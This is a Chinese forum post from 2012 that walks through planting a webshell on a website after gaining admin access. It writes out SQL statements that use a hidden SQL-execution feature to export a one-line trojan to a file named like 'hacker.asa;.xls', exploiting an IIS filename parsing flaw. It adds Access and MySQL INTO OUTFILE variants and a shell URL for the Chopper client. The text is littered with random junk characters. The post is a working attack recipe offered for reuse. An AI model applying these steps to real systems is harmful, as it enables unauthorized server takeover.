好不容易进了后台,发现啥上传啊。备份啊多木有。0 A; V2 C& g, }& O( t/ u# D/ E
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的; m+ P% G e9 y8 T
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,7 v3 {. V, r9 t( w2 C; X
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:% O% l* K# B: `: m( Q
1.create table cmd (a varchar(50))% p) X4 W# e3 X% k
2.insert into cmd (a) values (‘‘)7 u% H9 |3 H; Z& ?5 n& [1 }" `
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
5 K- B0 Q% b9 c( T( T(把表cmd的内容导出为物理路径的一个EXCEL文件)9 o- G$ P& G J8 K
4.drop table cmd
' `; ]3 A) ]$ W利用IIS的BUG成功拿到了WEBSHELL。
: Y& w( w9 _' \+ |) g O! E3 k
' ~6 E( C+ Q3 r2 V直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话. j" O% g% `4 U5 \, A" d1 [; _+ d
% E8 ]/ P) e) }% u9 Z; p& b
SQL语句意思解释: ~; k' G* @! X- H _; q& b
第一句2 U2 p# N/ Q! T
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为502 k- G3 p; S$ S" D: C8 u% s+ p
# x$ |5 U+ G U# _6 ^- v
第二句
0 O. D2 i/ ]0 \. R5 x! d4 u' c3 O' ^ 在表cmd的a字段插入一句话木马
7 x$ @* ^3 P+ B/ v 第三句5 W5 R r: s8 H7 q1 |! H* [
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
6 M( K* n# b3 h8 `7 B
/ U$ U+ f, j- @5 g0 r 第四句
# Y' J9 J, t `) N1 B) f1 P 删除建立的cmd表# q& O3 T: U6 Q
2 O R3 v- f* p' Q" l# }* A- K 以下内容为测试:
( i$ D ~9 i0 ^! ^ Access利用后台SQL执行命令功能导出WebShell:
# |" `& Y8 o' W1 b4 ? 这个更简单:/ w7 H! g- ^% z$ ~0 S
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
. d$ ?0 M L- E& S 或者
, X0 ~- S" n/ u- B. H; G* F [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol] L9 C+ N9 ] b% r* Y& S, ~, F6 g
! I& s6 P! R5 Z+ R5 T
后台有执行SQL语句功能(vote为已知表段). @6 p. b' F! k& }6 _
希望对大家有所帮助拿shell的又一个思路
0 j5 U% `& ^* g7 o/ h+ j# Y |
发表于 2012-9-13 17:53:58
收藏
支持
反对